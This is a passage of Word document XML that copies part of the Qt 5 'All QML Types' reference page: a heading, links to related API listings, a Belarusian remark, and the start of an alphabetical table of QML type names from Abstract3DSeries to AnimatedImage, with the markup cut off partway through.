            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qmltypes.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DF758D" w:rsidRPr="00B947D3" w:rsidRDefault="00DF758D" w:rsidP="00B90C6B">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1159" w:name="_Toc483000776"/>
      <w:bookmarkStart w:id="1160" w:name="_Toc483003774"/>
      <w:bookmarkStart w:id="1161" w:name="_Toc483604128"/>
      <w:bookmarkStart w:id="1162" w:name="_Toc483605348"/>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>All QML Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1159"/>
      <w:bookmarkEnd w:id="1160"/>
      <w:bookmarkEnd w:id="1161"/>
      <w:bookmarkEnd w:id="1162"/>
    </w:p>
    <w:p w:rsidR="00DF758D" w:rsidRPr="00DF758D" w:rsidRDefault="00DF758D" w:rsidP="00DF758D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF758D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This is a list of all QML types, including QML basic types. The following pages contain different API listings in different categories:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF758D" w:rsidRPr="00DF758D" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId687" w:history="1">
        <w:r w:rsidR="00DF758D" w:rsidRPr="00DF758D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>All QML Basic Types</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DF758D" w:rsidRPr="00DF758D" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId688" w:history="1">
        <w:r w:rsidR="00DF758D" w:rsidRPr="00DF758D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>All QML APIs by Module</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DF758D" w:rsidRPr="00DF758D" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId689" w:history="1">
        <w:r w:rsidR="00DF758D" w:rsidRPr="00DF758D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Obsolete QML Types</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DF758D" w:rsidRPr="00DF758D" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId690" w:history="1">
        <w:r w:rsidR="00DF758D" w:rsidRPr="00DF758D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>New Classes and Functions in Qt 5.8</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DF758D" w:rsidRPr="00DF758D" w:rsidRDefault="00DF758D" w:rsidP="00DF758D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF758D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For more reference pages including C++ APIs, visit</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF758D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId691" w:history="1">
        <w:r w:rsidRPr="00DF758D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Reference Pages</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DF758D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF758D" w:rsidRDefault="00DF758D" w:rsidP="00605F34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF758D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">усе </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF758D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF758D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> тыпы тут пералічаныя.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="11199"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976"/>
        <w:gridCol w:w="2393"/>
        <w:gridCol w:w="2995"/>
      </w:tblGrid>
      <w:tr w:rsidR="000821BB" w:rsidRPr="000821BB" w:rsidTr="000821BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>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eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000821BB">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>A</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692" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Abstract3DSeries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693" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AbstractActionInput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694" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AbstractAxis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695" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AbstractAxis3D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696" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AbstractAxisInput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697" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AbstractBarSeries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698" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AbstractButton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699" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AbstractDataProxy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00" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AbstractGraph3D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01" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AbstractInputHandler3D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02" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AbstractPhysicalDevice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03" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AbstractSeries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04" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AbstractTextureImage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05" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Accelerometer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06" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AccelerometerReading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07" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Accessible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08" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Action: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09" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Action: Qt3D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10" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ActionInput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11" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Address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12" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Affector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13" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Age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14" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AlphaCoverage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15" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AlphaTest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16" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Altimeter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17" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AltimeterReading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18" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AmbientLightReading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19" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AmbientLightSensor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20" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AmbientTemperatureReading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21" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AmbientTemperatureSensor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22" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AnalogAxisInput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23" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AnchorAnimation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24" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AnchorChanges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25" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AngleDirection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26" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AnimatedImage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27" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
